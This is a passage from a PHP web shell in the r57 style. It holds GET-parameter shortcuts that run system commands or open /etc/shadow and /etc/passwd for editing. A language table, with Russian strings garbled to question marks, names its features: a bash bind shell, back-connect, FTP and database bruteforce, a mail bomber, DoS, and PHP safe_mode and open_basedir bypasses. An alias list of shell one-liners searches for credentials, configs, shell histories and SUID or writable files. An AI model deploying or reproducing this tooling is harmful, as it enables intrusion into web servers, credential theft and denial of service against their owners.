794.  {$_POST['cmd'] = 'cat /etc/*realise';}
795. if(isset($_GET['service']))
796.  {$_POST['cmd'] = 'service --status-all';}
797. if(isset($_GET['ifconfig']))
798.  {$_POST['cmd'] = 'ifconfig';}
799. if(isset($_GET['w']))
800.  {$_POST['cmd'] = 'w';}
801. if(isset($_GET['who']))
802.  {$_POST['cmd'] = 'who';}
803. if(isset($_GET['uptime']))
804.  {$_POST['cmd'] = 'uptime';}
805. if(isset($_GET['last']))
806.  {$_POST['cmd'] = 'last -n 10';}
807. if(isset($_GET['psaux']))
808.  {$_POST['cmd'] = 'ps -aux';}
809. if(isset($_GET['netstat']))
810.  {$_POST['cmd'] = 'netstat -a';}
811. if(isset($_GET['lsattr']))
812.  {$_POST['cmd'] = 'lsattr -va';}
813. if(isset($_GET['syslog']))
814.  {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
815. if(isset($_GET['fstab']))
816.  {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
817. if(isset($_GET['fdisk']))
818.  {$_POST['cmd'] = 'fdisk -l';}
819. if(isset($_GET['df']))
820.  {$_POST['cmd'] = 'df -h';}
821. if(isset($_GET['realise2']))
822.  {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
823. if(isset($_GET['hosts']))
824.  {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
825. if(isset($_GET['resolv']))
826.  {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
827. if(isset($_GET['systeminfo']))
828.  {$_POST['cmd'] = 'systeminfo';}
829. if(isset($_GET['shadow']))
830.  {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
831. if(isset($_GET['passwd']))
832.  {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
833. #if(isset($_GET['']))
834. # {$_POST['cmd'] = '';}
835.  
836. $lang=array(
837. 'ru_text1' =>'??????????? ???????',
838. 'ru_text2' =>'?????????? ?????? ?? ???????',
839. 'ru_text3' =>'????????? ???????',
840. 'ru_text4' =>'??????? ??????????',
841. 'ru_text5' =>'???????? ?????? ?? ??????',
842. 'ru_text6' =>'????????? ????',
843. 'ru_text7' =>'??????',
844. 'ru_text8' =>'???????? ?????',
845. 'ru_butt1' =>'?????????',
846. 'ru_butt2' =>'?????????',
847. 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
848. 'ru_text10'=>'??????? ????',
849. 'ru_text11'=>'?????? ??? ???????',
850. 'ru_butt3' =>'???????',
851. 'ru_text12'=>'back-connect',
852. 'ru_text13'=>'IP-?????',
853. 'ru_text14'=>'????',
854. 'ru_butt4' =>'?????????',
855. 'ru_text15'=>'???????? ?????? ? ?????????? ???????',
856. 'ru_text16'=>'????????????',
857. 'ru_text17'=>'????????? ????',
858. 'ru_text18'=>'????????? ????',
859. 'ru_text19'=>'Exploits',
860. 'ru_text20'=>'????????????',
861. 'ru_text21'=>'????? ???',
862. 'ru_text22'=>'datapipe',
863. 'ru_text23'=>'????????? ????',
864. 'ru_text24'=>'????????? ????',
865. 'ru_text25'=>'????????? ????',
866. 'ru_text26'=>'????????????',
867. 'ru_butt5' =>'?????????',
868. 'ru_text28'=>'?????? ? safe_mode',
869. 'ru_text29'=>'?????? ????????',
870. 'ru_butt6' =>'???????',
871. 'ru_text30'=>'???????? ?????',
872. 'ru_butt7' =>'???????',
873. 'ru_text31'=>'???? ?? ??????',
874. 'ru_text32'=>'?????????? PHP ????',
875. 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)',
876. 'ru_butt8' =>'?????????',
877. 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
878. 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
879. 'ru_text36'=>'???? . ???????',
880. 'ru_text37'=>'?????',
881. 'ru_text38'=>'??????',
882. 'ru_text39'=>'????',
883. 'ru_text40'=>'???? ??????? ???? ??????',
884. 'ru_butt9' =>'????',
885. 'ru_text41'=>'????????? ? ?????',
886. 'ru_text42'=>'?????????????? ?????',
887. 'ru_text43'=>'????????????? ????',
888. 'ru_butt10'=>'?????????',
889. 'ru_butt11'=>'?????????????',
890. 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
891. 'ru_text45'=>'???? ????????',
892. 'ru_text46'=>'???????? phpinfo()',
893. 'ru_text47'=>'???????? ???????? php.ini',
894. 'ru_text48'=>'???????? ????????? ??????',
895. 'ru_text49'=>'???????? ??????? ? ???????',
896. 'ru_text50'=>'?????????? ? ??????????',
897. 'ru_text51'=>'?????????? ? ??????',
898. 'ru_text52'=>'????? ??? ??????',
899. 'ru_text53'=>'?????? ? ?????',
900. 'ru_text54'=>'????? ?????? ? ??????',
901. 'ru_butt12'=>'?????',
902. 'ru_text55'=>'?????? ? ??????',
903. 'ru_text56'=>'?????? ?? ???????',
904. 'ru_text57'=>'???????/??????? ????/??????????',
905. 'ru_text58'=>'???',
906. 'ru_text59'=>'????',
907. 'ru_text60'=>'??????????',
908. 'ru_butt13'=>'???????/???????',
909. 'ru_text61'=>'???? ??????',
910. 'ru_text62'=>'?????????? ???????',
911. 'ru_text63'=>'???? ??????',
912. 'ru_text64'=>'?????????? ???????',
913. 'ru_text65'=>'???????',
914. 'ru_text66'=>'???????',
915. 'ru_text67'=>'Chown/Chgrp/Chmod',
916. 'ru_text68'=>'???????',
917. 'ru_text69'=>'????????1',
918. 'ru_text70'=>'????????2',
919. 'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
920. 'ru_text72'=>'????? ??? ??????',
921. 'ru_text73'=>'?????? ? ?????',
922. 'ru_text74'=>'?????? ? ??????',
923. 'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
924. 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
925. 'ru_text80'=>'???',
926. 'ru_text81'=>'????',
927. 'ru_text82'=>'???? ??????',
928. 'ru_text83'=>'?????????? SQL ???????',
929. 'ru_text84'=>'SQL ??????',
930. 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
931. 'ru_text86'=>'?????????? ????? ? ???????',
932. 'ru_butt14'=>'???????',
933. 'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
934. 'ru_text88'=>'??????:????',
935. 'ru_text89'=>'???? ?? ftp ???????',
936. 'ru_text90'=>'????? ????????',
937. 'ru_text91'=>'???????????? ?',
938. 'ru_text92'=>'??? ?????.',
939. 'ru_text93'=>'FTP',
940. 'ru_text94'=>'FTP-????????',
941. 'ru_text95'=>'?????? ?????????????',
942. 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
943. 'ru_text97'=>'????????? ??????????: ',
944. 'ru_text98'=>'??????? ???????????: ',
945. 'ru_text99'=>'/etc/passwd',
946. 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
947. 'ru_text101'=>'???????????? (user -> resu)',
948. 'ru_text102'=>'?????',
949. 'ru_text103'=>'???????? ??????',
950. 'ru_text104'=>'???????? ????? ?? ???????? ????',
951. 'ru_text105'=>'????',
952. 'ru_text106'=>'??',
953. 'ru_text107'=>'????',
954. 'ru_butt15'=>'?????????',
955. 'ru_text108'=>'????? ??????',
956. 'ru_text109'=>'????????',
957. 'ru_text110'=>'??????????',
958. 'ru_text111'=>'SQL-?????? : ????',
959. 'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',
960. 'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list (PHP <= 5.1.2)',
961. 'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body (PHP <= 5.1.2)',
962. 'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
963. 'ru_text116'=>'?????????? ????',
964. 'ru_text117'=>'?',
965. 'ru_text118'=>'???? ??????????',
966. 'ru_text119'=>'?? ??????? ??????????? ????',
967. 'ru_text120'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
968. 'ru_text121'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? fopen (PHP v4.4.0 memory leak) by NST',
969. 'ru_text122'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? glob (PHP <= 5.2.x)',
970. 'ru_text123'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.bzip ?????? [compress.bzip2://] (PHP <= 5.2.1)',
971. 'ru_text124'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? error_log[php://] (PHP <= 5.1.4, 4.4.2)',
972. 'ru_text125'=>'??????',
973. 'ru_text126'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????[NULL-byte] (PHP <= 5.2.0)',
974. 'ru_text127'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? readfile[php://] (PHP <= 5.2.1, 4.4.4)',
975. 'ru_text128'=>'???? ?????????\???????(touch)',
976. 'ru_text129'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ? fopen[srpath://] (PHP v5.2.0)',
977. 'ru_text130'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.zip ?????? [zip://] (PHP <= 5.2.1)',
978. 'ru_text131'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ??????????? ????? ? ?????????????? symlink() (PHP <= 5.2.1)',
979. 'ru_text132'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? symlink() (PHP <= 5.2.1)',
980. 'ru_text133'=>'',
981. 'ru_text134'=>'???????? ??? ??????',
982. 'ru_text135'=>'???????',
983. 'ru_text136'=>'???????? ?????????? ??????',
984. 'ru_text137'=>'????????',
985. 'ru_text138'=>'???????',
986. 'ru_text139'=>'????-??????',
987. 'ru_text140'=>'DoS',
988. 'ru_text141'=>'?????????! ???????? ???? ???-???????.',
989. 'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
990. 'ru_err1'=>'??????! ?? ???? ????????? ???? ',
991. 'ru_err2'=>'??????! ?? ??????? ??????? ',
992. 'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
993. 'ru_err4'=>'?????? ??????????? ?? ftp ???????',
994. 'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
995. 'ru_err6'=>'??????! ?? ??????? ????????? ??????',
996. 'ru_err7'=>'?????? ??????????',
997. /* --------------------------------------------------------------- */
998. 'eng_text1' =>'Jalankan Perintah',
999. 'eng_text2' =>'Jalankan Perintah di Server',
1000. 'eng_text3' =>'Jalankan Perintah',
1001. 'eng_text4' =>'Direktory kerja',
1002. 'eng_text5' =>'Upload file ke server',
1003. 'eng_text6' =>'Local file',
1004. 'eng_text7' =>'Aliases',
1005. 'eng_text8' =>'Select alias',
1006. 'eng_butt1' =>'Jalankan',
1007. 'eng_butt2' =>'Upload',
1008. 'eng_text9' =>'Bind port to /bin/bash',
1009. 'eng_text10'=>'Port',
1010. 'eng_text11'=>'Password for access',
1011. 'eng_butt3' =>'Bind',
1012. 'eng_text12'=>'back-connect',
1013. 'eng_text13'=>'IP',
1014. 'eng_text14'=>'Port',
1015. 'eng_butt4' =>'Connect',
1016. 'eng_text15'=>'Upload file dari remote server',
1017. 'eng_text16'=>'With',
1018. 'eng_text17'=>'Remote file',
1019. 'eng_text18'=>'Local file',
1020. 'eng_text19'=>'Exploits',
1021. 'eng_text20'=>'Use',
1022. 'eng_text21'=>'&nbsp;Nama Baru',
1023. 'eng_text22'=>'datapipe',
1024. 'eng_text23'=>'Local port',
1025. 'eng_text24'=>'Remote host',
1026. 'eng_text25'=>'Remote port',
1027. 'eng_text26'=>'Use',
1028. 'eng_butt5' =>'Run',
1029. 'eng_text28'=>'Work in safe_mode',
1030. 'eng_text29'=>'ACCESS DENIED',
1031. 'eng_butt6' =>'Change',
1032. 'eng_text30'=>'Cat file',
1033. 'eng_butt7' =>'Show',
1034. 'eng_text31'=>'File Tidak di Temukan',
1035. 'eng_text32'=>'Eval kode PHP',
1036. 'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
1037. 'eng_butt8' =>'Test',
1038. 'eng_text34'=>'Test bypass safe_mode with include function',
1039. 'eng_text35'=>'Test bypass safe_mode with load file in mysql',
1040. 'eng_text36'=>'Database . Table',
1041. 'eng_text37'=>'Login',
1042. 'eng_text38'=>'Password',
1043. 'eng_text39'=>'Database',
1044. 'eng_text40'=>'Dump database table',
1045. 'eng_butt9' =>'Dump',
1046. 'eng_text41'=>'Save dump in file',
1047. 'eng_text42'=>'Edit files',
1048. 'eng_text43'=>'File for edit',
1049. 'eng_butt10'=>'Save',
1050. 'eng_text44'=>'Can\'t edit file! Only read access!',
1051. 'eng_text45'=>'File saved',
1052. 'eng_text46'=>'Tampilkan phpinfo()',
1053. 'eng_text47'=>'Tampilkan variables dari php.ini',
1054. 'eng_text48'=>'Hapus temp files',
1055. 'eng_butt11'=>'Edit file',
1056. 'eng_text49'=>'Hapus script dari server',
1057. 'eng_text50'=>'View cpu info',
1058. 'eng_text51'=>'View memory info',
1059. 'eng_text52'=>'Find text',
1060. 'eng_text53'=>'In dirs',
1061. 'eng_text54'=>'Cari text di file',
1062. 'eng_butt12'=>'Find',
1063. 'eng_text55'=>'Only in files',
1064. 'eng_text56'=>'Nothing :(',
1065. 'eng_text57'=>'Create/Delete File/Dir',
1066. 'eng_text58'=>'name',
1067. 'eng_text59'=>'file',
1068. 'eng_text60'=>'dir',
1069. 'eng_butt13'=>'Create/Delete',
1070. 'eng_text61'=>'File created',
1071. 'eng_text62'=>'Dir created',
1072. 'eng_text63'=>'File deleted',
1073. 'eng_text64'=>'Dir deleted',
1074. 'eng_text65'=>'Create',
1075. 'eng_text66'=>'Delete',
1076. 'eng_text67'=>'Chown/Chgrp/Chmod',
1077. 'eng_text68'=>'Command',
1078. 'eng_text69'=>'param1',
1079. 'eng_text70'=>'param2',
1080. 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
1081. 'eng_text72'=>'Text for find',
1082. 'eng_text73'=>'Find in folder',
1083. 'eng_text74'=>'Find in files',
1084. 'eng_text75'=>'* you can use regexp',
1085. 'eng_text76'=>'Search text in files via find',
1086. 'eng_text80'=>'Type',
1087. 'eng_text81'=>'Net',
1088. 'eng_text82'=>'Databases',
1089. 'eng_text83'=>'Jalankan SQL query',
1090. 'eng_text84'=>'SQL query',
1091. 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
1092. 'eng_text86'=>'Download files dari server',
1093. 'eng_butt14'=>'Download',
1094. 'eng_text87'=>'Download files dari remote ftp-server',
1095. 'eng_text88'=>'server:port',
1096. 'eng_text89'=>'File on ftp',
1097. 'eng_text90'=>'Transfer mode',
1098. 'eng_text91'=>'Archivation',
1099. 'eng_text92'=>'without arch.',
1100. 'eng_text93'=>'FTP',
1101. 'eng_text94'=>'FTP-bruteforce',
1102. 'eng_text95'=>'Users list',
1103. 'eng_text96'=>'Can\'t get users list',
1104. 'eng_text97'=>'checked: ',
1105. 'eng_text98'=>'success: ',
1106. 'eng_text99'=>'/etc/passwd',
1107. 'eng_text100'=>'Kirim file ke remote ftp server',
1108. 'eng_text101'=>'Use reverse (user -> resu)',
1109. 'eng_text102'=>'Mail',
1110. 'eng_text103'=>'kirim Email',
1111. 'eng_text104'=>'Kirim file ke email',
1112. 'eng_text105'=>'To',
1113. 'eng_text106'=>'From',
1114. 'eng_text107'=>'Subj',
1115. 'eng_butt15'=>'Send',
1116. 'eng_text108'=>'Mail',
1117. 'eng_text109'=>'Hide',
1118. 'eng_text110'=>'Show',
1119. 'eng_text111'=>'SQL-Server : Port',
1120. 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',
1121. 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)',
1122. 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)',
1123. 'eng_text115'=>'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
1124. 'eng_text116'=>'Copy from',
1125. 'eng_text117'=>'to',
1126. 'eng_text118'=>'File copied',
1127. 'eng_text119'=>'Cant copy file',
1128. 'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
1129. 'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
1130. 'eng_text122'=>'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)',
1131. 'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
1132. 'eng_text124'=>'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)',
1133. 'eng_text125'=>'Data',
1134. 'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
1135. 'eng_text127'=>'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)',
1136. 'eng_text128'=>'Modify/Access date(touch)',
1137. 'eng_text129'=>'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)',
1138. 'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
1139. 'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
1140. 'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
1141. 'eng_text133'=>'',
1142. 'eng_text134'=>'Database-bruteforce',
1143. 'eng_text135'=>'Dictionary',
1144. 'eng_text136'=>'Creating evil symlink',
1145. 'eng_text137'=>'Useful',
1146. 'eng_text138'=>'Dangerous',
1147. 'eng_text139'=>'Mail Bomber',
1148. 'eng_text140'=>'DoS',
1149. 'eng_text141'=>'Danger! Web-daemon crash possible.',
1150. 'eng_err0'=>'Error! Can\'t write in file ',
1151. 'eng_err1'=>'Error! Can\'t read file ',
1152. 'eng_err2'=>'Error! Can\'t create ',
1153. 'eng_err3'=>'Error! Can\'t connect to ftp',
1154. 'eng_err4'=>'Error! Can\'t login on ftp server',
1155. 'eng_err5'=>'Error! Can\'t change dir on ftp',
1156. 'eng_err6'=>'Error! Can\'t sent mail',
1157. 'eng_err7'=>'Mail send',
1158. );
1159. /*
1160. ?????? ??????
1161. ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
1162. ?? ?????? ???? ????????? ??? ???????? ???????.
1163. */
1164. $aliases=array(
1165. '----------------------------------locate'=>'',
1166. 'locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
1167. 'locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
1168. 'locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
1169. 'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
1170. 'locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
1171. 'locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1172. 'locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1173. 'locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1174. 'locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
1175. 'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1176. 'locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
1177. 'locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1178. 'locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1179. 'locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
1180. 'locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
1181. 'locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
1182. 'locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".htpasswd" >> /tmp/grep.txt;cat /tmp/grep.txt',
1183. 'locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
1184. 'locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
1185. 'locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt',
1186. 'locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt',
1187. 'locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt',
1188. '----------------------------------tar'=>'',
1189. 'tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt',
1190. '----------------------------------1'=>'',
1191. 'locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
1192. 'locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
1193. 'locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
1194. 'locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
1195. 'locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt',
1196. '----------------------------------2'=>'',
1197. 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt',
1198. '----------------------------------find'=>'',
1199. 'find suid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1200. 'find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1201. 'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1202. 'find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1203. 'find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1204. 'find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1205. 'find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /  -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1206. 'find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1207. 'find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1208. 'find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
1209. 'find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .htpasswd  >> /tmp/grep.txt;cat /tmp/grep.txt',
1210. 'find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .bash_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
1211. 'find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .mysql_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
1212. 'find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .fetchmailrc  >> /tmp/grep.txt;cat /tmp/grep.txt',
1213. 'find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
1214. 'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
1215. 'find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
1216. 'find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1217. 'find config* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "config*"  >> /tmp/grep.txt;cat /tmp/grep.txt',
1218. 'find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1219. 'find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1220. 'find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
1221. 'find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1222. 'find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
1223. 'find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1224. 'find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
1225. 'find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
1226. 'find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
1227. 'find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
1228. 'find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt',
1229. 'find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt',
1230. '-----------------------------------'=>'',
1231. 'find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
1232. 'find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
1233. 'find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
1234. 'find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
